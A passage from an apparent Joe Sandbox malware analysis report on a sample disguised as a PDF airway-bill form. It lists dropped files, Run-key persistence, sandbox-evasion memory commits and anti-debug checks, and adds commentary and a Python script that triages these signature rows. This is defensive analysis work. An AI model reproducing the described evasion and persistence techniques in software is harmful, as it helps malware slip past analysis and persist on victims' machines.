                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004148B6 pushad ; retn 9DA8h 3_2_00414987
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0040D99D push esp; iretd 3_2_0040D99E
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004182B8 push 0000005Bh; iretd 3_2_004182BA
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_00416373 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_00416305 push ds; iretd 3_2_00416372

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | File created: C:\Users\Public\Libraries\dxobknwL.pif
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | File created: C:\Users\Public\Libraries\Lwnkboxd.PIF
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | File created: \delivery form - airway bill details - tracking info 45821631127i ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lwnkboxd
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0294A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0294A95C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF  Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\proquota.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 2880000 memory commit 500006912
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 2881000 memory commit 500178944
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 28AC000 memory commit 500002816
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 28AD000 memory commit 500199424
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 28DE000 memory commit 501014528
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 29D6000 memory commit 500006912
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 29D8000 memory commit 500015104
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Memory allocated: 2930000 memory commit 500006912
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Memory allocated: 2931000 memory commit 500178944
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Memory allocated: 295C000 memory commit 500002816
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Memory allocated: 295D000 memory commit 500199424
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Memory allocated: 298E000 memory commit 501014528
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Memory allocated: 2A86000 memory commit 500006912
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Memory allocated: 2A88000 memory commit 500015104
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 2870000 memory commit 500006912
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 2871000 memory commit 500178944
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 289C000 memory commit 500002816
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 289D000 memory commit 500199424
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 28CE000 memory commit 501014528
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 29C6000 memory commit 500006912
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 29C8000 memory commit 500015104
Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\proquota.exe; API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A08096E rdtsc
Source: C:\Users\Public\Libraries\dxobknwL.pif; API coverage: 0.8 %
Source: C:\Users\Public\Libraries\dxobknwL.pif; API coverage: 0.3 %
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe TID: 5252; Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (2 hits)
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Code function: 0_2_029358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.00000000006E7000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: Lwnkboxd.PIF, 00000005.00000002.1883846137.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000002.2023111489.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: IzFuULsBXSkS.exe, 00000013.00000002.2916108350.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; API call chain: ExitProcess graph end node (graph_0-29044)
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; API call chain: ExitProcess graph end node (graph_5-26832)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Process information queried: ProcessInformation
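A few of the rows above, and of the Anti Debugging rows that follow, need context before they are taken at face value. The seven "memory commit" entries per process are each roughly 477 MiB and sum to about 3.3 GiB, a standard way to fail early on memory-starved analysis VMs. "mov eax, dword ptr fs:[00000030h]" reads the PEB pointer from the 32-bit TEB; the PEB holds BeingDebugged and NtGlobalFlag, but a position-independent loader also starts at PEB->Ldr to resolve APIs, so a high hit count is not by itself proof of a debugger check. "Process queried: DebugPort" is NtQueryInformationProcess(ProcessDebugPort), the same query CheckRemoteDebuggerPresent wraps. The "Hyper-V RAW" string is the Winsock catalog name of the Hyper-V socket provider that mswsock.dll registers on current Windows builds, which is why it appears glued to the mswsock.dll path in memory, so on its own it is weak evidence of VM detection. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in this report's layout (with or without a separator after the source path), groups hits by process image, counts PEB reads per function, sums committed memory and prints one triage line per image. The sample rows are constructed from entries in this report; the 256 MiB threshold and the technique labels are this example's own choices.

```python
"""Triage helper for Joe Sandbox evasion / anti-debug signature rows.

Added example, not Joe Sandbox code. Parses plain-text rows of the shape
    Source: <process>[;|] <signature kind>: <details>
where the separator after the process may be missing entirely (as in
copy-pasted report text), groups hits by process image and summarises
the evasion techniques each image shows.
"""
import re
from collections import Counter, defaultdict

MIB = 1024 * 1024

# Constructed sample: rows copied in shape from this report (most with a
# separator after the source, the last one without, to show both parse).
SAMPLE = r"""
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 2880000 memory commit 500006912
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Memory allocated: 2881000 memory commit 500178944
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A08096E rdtsc
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Process queried: DebugPort
Source: C:\Windows\SysWOW64\proquota.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Code function: 0_2_0294EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
Source: Lwnkboxd.PIF, 00000005.00000002.1883846137.000000000059E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
"""

KINDS = ("Memory allocated", "Code function", "Process queried",
         "Binary or memory string", "API/Special instruction interceptor")
SIG_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*[;|]?\s*(?P<kind>"
    + "|".join(re.escape(k) for k in KINDS)
    + r"):\s*(?P<rest>.*)$")
# "<module>, <dump-id>.sdmp" pairs, as used by memory-string hits.
DUMP_RE = re.compile(r",\s*[0-9A-F]{8}(?:\.[0-9A-F]+)+\.sdmp,?\s*")


def images(src):
    """Reduce a Source field to the process image basename(s) it names."""
    return [s.rsplit("\\", 1)[-1] for s in DUMP_RE.split(src) if s]


def classify(kind, rest):
    """Map one signature row to (technique label, detail)."""
    if kind == "Memory allocated":
        m = re.search(r"memory commit (\d+)", rest)
        return "large-commit", (int(m.group(1)) if m else 0)
    if kind == "Code function":
        parts = rest.split()
        func = parts[0] if parts else ""
        if "rdtsc" in rest:
            return "rdtsc-timing", func
        if "fs:[00000030h]" in rest:  # PEB pointer read from the 32-bit TEB
            return "peb-read", func
        if "CheckRemoteDebuggerPresent" in rest:
            return "CheckRemoteDebuggerPresent", func
        return "other-code", func
    if kind == "Process queried" and "DebugPort" in rest:
        return "ProcessDebugPort", None  # NtQueryInformationProcess(ProcessDebugPort)
    if kind == "Binary or memory string" and "Hyper-V RAW" in rest:
        # Next to mswsock.dll this is Winsock catalog text, not a VM probe.
        return ("hyperv-string-winsock" if "mswsock.dll" in rest else "hyperv-string"), None
    if kind == "API/Special instruction interceptor":
        return "special-instruction-hook", rest
    return "other", None


def summarise(text):
    """Per-image counters: committed bytes, PEB reads per function, techniques."""
    procs = defaultdict(lambda: {"commit_bytes": 0, "commit_count": 0,
                                 "peb_reads": Counter(), "techniques": Counter()})
    for line in text.splitlines():
        m = SIG_RE.match(line.strip())
        if not m:
            continue
        tech, detail = classify(m["kind"], m["rest"])
        for image in images(m["src"]):
            p = procs[image]
            p["techniques"][tech] += 1
            if tech == "large-commit":
                p["commit_bytes"] += detail
                p["commit_count"] += 1
            elif tech == "peb-read":
                p["peb_reads"][detail] += 1
    return dict(procs)


def report(text, commit_threshold_mib=256):
    """One triage line per image; the threshold is this example's assumption."""
    lines = []
    for name, p in sorted(summarise(text).items()):
        notes = []
        if p["commit_bytes"] >= commit_threshold_mib * MIB:
            notes.append(f"commits {p['commit_bytes'] // MIB} MiB over "
                         f"{p['commit_count']} allocations (starves low-RAM sandboxes)")
        if p["peb_reads"]:
            func, hits = p["peb_reads"].most_common(1)[0]
            notes.append(f"{sum(p['peb_reads'].values())} fs:[30h] PEB reads in "
                         f"{len(p['peb_reads'])} functions, peak {hits} in {func} "
                         "(BeingDebugged/NtGlobalFlag check or plain PEB->Ldr API resolution)")
        for t in ("rdtsc-timing", "CheckRemoteDebuggerPresent",
                  "ProcessDebugPort", "special-instruction-hook"):
            if p["techniques"][t]:
                notes.append(f"{t} x{p['techniques'][t]}")
        if p["techniques"]["hyperv-string-winsock"]:
            notes.append("'Hyper-V RAW' adjacent to mswsock.dll: Winsock catalog text, "
                         "weak VM-detection evidence")
        lines.append(f"{name}: " + "; ".join(notes))
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE)))
```

Feed it the copied text of the Malware Analysis System Evasion and Anti Debugging sections and it collapses the hundreds of fs:[30h] rows into one count per function, which is what you actually want to compare against the process's import resolution before calling it an anti-debug check.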

Anti Debugging

Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Code function: 0_2_0294EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Process queried: DebugPort
Source: C:\Users\Public\Libraries\dxobknwL.pif; Process queried: DebugPort (3 hits)
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; Process queried: DebugPort (2 hits)
Source: C:\Windows\SysWOW64\proquota.exe; Process queried: DebugPort (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A08096E rdtsc
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_00417B33 LdrLoadDll
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Code function: 0_2_029487A0 LoadLibraryW,GetProcAddress,FreeLibrary
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A07CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A06EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A064A35 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h] (7 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A050A5B mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A07CA6F mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0EEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0BCA72 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h] (9 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A114A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A078A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A048AA0 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A096AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A096ACC mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A040AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A074AD0 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A07AAEE mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A114B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h] (9 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A06EB20 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A108B28 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0F4B4B mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A112B57 mov eax, dword ptr fs:[00000030h] (4 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0E8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0D6B40 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A10AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A038B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0EEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A03CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A050BBE mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0F4BB0 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A040BCD mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A060BCB mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0EEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A048BF0 mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A06EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A062835 mov eax, dword ptr fs:[00000030h] (5 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A062835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0E483A mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A07A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A052840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A070854 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A044859 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0D6870 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CE872 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A040887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A06E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A1108C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A10A8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A07C8F9 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0BE908 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A038918 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0C892A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0D892B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0C0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A114940 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A066962 mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A08096E mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A08096E mov edx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CC97C mov eax, dword ptr fs:[00000030h]
